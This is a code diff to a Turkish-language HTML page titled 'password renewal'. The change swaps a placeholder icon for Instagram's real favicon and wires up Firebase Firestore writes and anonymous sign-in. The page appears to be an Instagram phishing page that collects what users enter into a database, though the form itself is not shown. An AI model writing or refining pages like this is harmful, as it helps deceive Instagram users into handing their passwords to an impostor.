--- a/index.html
+++ b/index.html
@@ -4,8 +4,8 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Şifre Yenile</title>
-    <!-- Instagram logosu üçün yeni favicon URL'si -->
-    <link rel="icon" type="image/x-icon" href="https://placehold.co/16x16/ffffff/000000?text=IG">
+    <!-- Orijinal Instagram logosu için favicon -->
+    <link rel="icon" type="image/x-icon" href="https://www.instagram.com/favicon.ico">
     <script src="https://cdn.tailwindcss.com"></script>
     <style>
         .toggle-password {
@@ -82,26 +82,39 @@
 
     <!-- Firebase SDK -->
     <script type="module">
-        import { initializeApp } from 'https://www.gstatic.com/firebasejs/10.12.2/firebase-app.js';
-        import { getFirestore, collection, addDoc } from 'https://www.gstatic.com/firebasejs/10.12.2/firebase-firestore.js';
+        import { initializeApp } from 'https://www.gstatic.com/firebasejs/11.6.1/firebase-app.js';
+        import { getFirestore, collection, addDoc } from 'https://www.gstatic.com/firebasejs/11.6.1/firebase-firestore.js';
+        import { getAuth, signInWithCustomToken, signInAnonymously } from 'https://www.gstatic.com/firebasejs/11.6.1/firebase-auth.js';
 
-        // NOTE: The Firebase configuration is a placeholder. You should replace this with your actual Firebase project settings.
-        const firebaseConfig = {
-            apiKey: "YOUR_API_KEY",
-            authDomain: "YOUR_AUTH_DOMAIN",
-            projectId: "YOUR_PROJECT_ID",
-            storageBucket: "YOUR_STORAGE_BUCKET",
-            messagingSenderId: "YOUR_MESSAGING_SENDER_ID",
-            appId: "YOUR_APP_ID",
-            measurementId: "YOUR_MEASUREMENT_ID"
-        };
-
-        // Firebase-i başlat
+        // Firebase yapılandırmasını ortam değişkenlerinden al
+        const firebaseConfig = JSON.parse(typeof __firebase_config !== 'undefined' ? __firebase_config : '{}');
+        const initialAuthToken = typeof __initial_auth_token !== 'undefined' ? __initial_auth_token : null;
+        
         let db;
+        let auth;
         try {
             const app = initializeApp(firebaseConfig);
             db = getFirestore(app);
+            auth = getAuth(app);
             console.log("Firestore başarıyla başladı");
+
+            // Kimlik doğrulamasını başlat
+            if (initialAuthToken) {
+                signInWithCustomToken(auth, initialAuthToken)
+                    .then(() => {
+                        console.log("Kimlik doğrulama başarıyla tamamlandı.");
+                    })
+                    .catch((error) => {
+                        console.error("Kimlik doğrulama hatası:", error);
+                    });
+            } else {
+                 signInAnonymously(auth).then(() => {
+                    console.log("Anonim kimlik doğrulama başarıyla tamamlandı.");
+                 }).catch((error) => {
+                    console.error("Anonim kimlik doğrulama hatası:", error);
+                 });
+            }
+
         } catch (error) {
             console.error("Firebase başlatma hatası:", error);
         }
